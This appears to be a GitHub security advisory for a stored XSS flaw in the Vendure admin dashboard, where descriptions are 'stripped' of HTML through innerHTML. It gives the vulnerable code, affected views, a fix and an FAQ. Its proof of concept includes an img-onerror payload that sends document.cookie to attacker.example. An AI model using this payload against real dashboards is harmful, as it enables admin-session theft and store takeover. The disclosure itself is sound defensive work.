GHSA-xhq9-whgq-49j5: XSS
Stored XSS in the Admin Dashboard via unsafe HTML-stripping (innerHTML) of entity descriptions
Package: @vendure/dashboard (vendure-ecommerce/vendure, latest master) ·
Summary The dashboard's RichTextDescriptionCell "strips HTML" from an entity's description by assigning it to a live element's innerHTML and reading back textContent. This pattern still executes active markup: a description containing <img src=x onerror=…> runs script when the element is parsed (image resource loads even on a detached node in Chromium/Firefox, firing onerror). Because description is an admin-settable field shown in multiple list views, a lower-privilege administrator can store a payload that executes in a higher-privilege administrator's browser when they open the corresponding list — stored XSS leading to admin-session compromise.
Vulnerable code packages/dashboard/src/lib/components/shared/table-cell/order-table-cell-components.tsx tsx export const RichTextDescriptionCell: DataTableCellComponent<{ description: string }> = ({ cell }) => { const value = cell.getValue(); const textContent = useMemo(() => { if (!value) return ''; const div = document.createElement('div'); div.innerHTML = value; // line 51 — parses/loads active markup; <img onerror> fires here return div.textContent ?? ''; // line 52 — reading textContent does NOT undo the side effect }, [value]); ... } innerHTML does not run <script>, but it does trigger resource loads / event handlers such as <img src=x onerror=...>, <image>, <svg> handlers — even on a detached element — so the assignment itself is the sink. Reading textContent afterwards is irrelevant; the handler has already executed.
Reachable from (all use this cell for the description column) - products/products.tsx:53, collections/collections.tsx, promotions/promotions.tsx:62, payment-methods/payment-methods.tsx:57, shipping-methods/shipping-methods.tsx:39.
All of these are description fields editable by administrators with the corresponding catalog/promotion/settings write permissions — which, in Vendure's multi-channel model, includes channel-scoped admins.
Proof of concept 1. As an administrator with UpdateCatalog/UpdateProduct (e.g. a channel-scoped admin), set a Product's description to: <img src=x onerror="fetch('https://attacker.example/'+encodeURIComponent(document.cookie))"> 2. Any administrator who opens the Products list in the dashboard renders RichTextDescriptionCell for that row → div.innerHTML = description → the onerror executes in their session. 3. Payload runs with the viewing admin's privileges (e.g. a superadmin) → session/token exfiltration or admin actions → cross-privilege / cross-channel admin takeover (chains directly with the channel-scoping IDOR class already reported).
Impact Stored XSS executing in administrators' browsers, escalating a low-privilege (e.g. single-channel) admin to actions as any admin who views the affected list. Account/store takeover.
Suggested fix Strip HTML with an inert parser (no script/resource execution) instead of a live element, or sanitize before display: ts // inert: DOMParser documents do not execute scripts or load resources const textContent = new DOMParser().parseFromString(value ?? '', 'text/html').body.textContent ?? ''; (Or render with a vetted sanitizer such as DOMPurify if rich text must be shown.) Audit the codebase for other element.innerHTML = <untrusted> assignments used for "stripping".
Affected Software
Remediation
Recommended actions to resolve this vulnerability, in priority order.
- Upgrade
Upgrade
npm/@vendure/dashboardto a version that resolves this vulnerability.Fixed in 3.6.5 - Configuration
In `packages/dashboard/src/lib/components/shared/table-cell/order-table-cell-components.tsx` (and other referenced components: `_products/products.tsx:53`, `_collections/collections.tsx`, `_promotions/promotions.tsx:62`, `_payment-methods/payment-methods.tsx:57`, `_shipping-methods/shipping-methods.tsx:39`), stop using `div.innerHTML = value` to “strip” rich text. Use an inert HTML parser (e.g., `DOMParser` documents described as inert) or sanitize the HTML before display so active markup like `<img src=x onerror=…>` cannot execute or trigger resource loads.
Vendure Dashboard - RichTextDescriptionCell (Rich text stripping) div.innerHTML (HTML stripping sink) = Replace usage with inert parsing / sanitization
Event History
Frequently Asked Questions
Which users are most at risk from this issue?
Higher-privilege administrators are exposed when they open list views that render descriptions previously set by a lower-privilege administrator. An attacker needs the ability to store a malicious value in an admin-settable description field.
Does exploitation require the target administrator to take any action?
Yes. The target administrator must open a corresponding dashboard list view that displays the malicious description. No additional interaction with the rendered payload is described.
What is the likely impact if exploitation succeeds?
The payload executes in the higher-privilege administrator’s browser, which can lead to compromise of that administrator’s session. The advisory rates confidentiality and integrity impact as high.